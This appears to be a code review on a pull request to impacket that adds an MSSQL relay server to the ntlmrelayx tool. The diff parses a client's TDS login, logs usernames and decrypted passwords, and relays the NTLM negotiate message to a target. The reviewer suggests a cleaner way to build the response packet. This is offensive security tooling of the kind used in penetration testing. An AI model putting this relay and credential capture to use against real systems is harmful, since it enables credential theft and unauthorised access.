impacket/examples/ntlmrelayx/servers/mssqlrelayserver.py

```diff
@@ -0,0 +1,294 @@
+                        
+                    elif packet[0] == 0x10:    # Login stage
+                    
+                        LOG.debug("(MSSQL): Parsing the client's login request")
+                        loginData = tds.TDS_LOGIN()
+                        loginData.fromString(packet[8:])
+                        LOG.info("(MSSQL): Client login request:")
+                        if loginData["HostName"]:
+                            LOG.info("(MSSQL): Hostname    : %s" % loginData["HostName"].decode("utf-8"))
+                        if loginData["ServerName"]:
+                            LOG.info("(MSSQL): Server Name : %s" % loginData["ServerName"].decode("utf-8"))
+                        if loginData["CltIntName"]:
+                            LOG.info("(MSSQL): Client Name : %s" % loginData["CltIntName"].decode("utf-8")) 
+                        if loginData["AppName"]:
+                            LOG.info("(MSSQL): App Name    : %s" % loginData["AppName"].decode("utf-8"))                                               
+                        if loginData["Database"]:
+                            LOG.info("(MSSQL): Database    : %s" % loginData["Database"].decode("utf-8"))
+                        if loginData["UserName"]:
+                            LOG.info("(MSSQL): Username    : %s" % loginData["UserName"].decode("utf-8"))
+                        if loginData["Password"]:
+                            password = self.decryptPassword(loginData["Password"])
+                            LOG.info("(MSSQL): Password    : %s" % password.decode("utf-8"))
+                            LOG.info("(MSSQL): Password is not empty. Relay is not required.")
+                        if not loginData["SSPI"]:
+                            LOG.error("(MSSQL): NTLMSSP_NEGOTIATE not found in login message")
+                            break                        
+                        negotiateMessage = loginData["SSPI"]
+                        self.login = loginData
+                        # For MSSQL, we change the database and target server name
+                        if (self.target.scheme.upper() == "MSSQL"):
+                            self.client.sendNegotiate = self.sendNegotiate
+                                
+                        self.challengeMessage = self.client.sendNegotiate(negotiateMessage)
+                        
+                        TDSLen = len(self.challengeMessage)+11
+                        TDSLenHex = TDSLen.to_bytes(2, byteorder='big')
+                        challengeLen = len(self.challengeMessage)
+                        challengeLenHex = challengeLen.to_bytes(2, byteorder='little')
+                        challenge = bytes.fromhex(str(self.challengeMessage))
+                        TDSResponsePacket=b'\x04\x01' + TDSLenHex+ b'\x00\x00\x00\x00\xed' + challengeLenHex + challenge
+                        self.request.send(TDSResponsePacket)
```

Comment:
Similar to the PRE_LOGIN response handled before. Creating the responses with right structures

```suggestion
                        self.challengeMessage = self.client.sendNegotiate(negotiateMessage)
                        challenge = bytes.fromhex(str(self.challengeMessage))

                        tds_response = tds.TDSPacket()
                        tds_response['Type'] = tds.TDS_TABULAR
                        tds_response['Status'] = tds.TDS_STATUS_EOM
                        tds_response['PacketID'] = 0
                        # TDS_SSPI token + little-endian length + payload
                        tds_response['Data'] = struct.pack('<BH', tds.TDS_SSPI_TOKEN, len(challenge)) + challenge

                        self.request.send(tds_response.getData())
```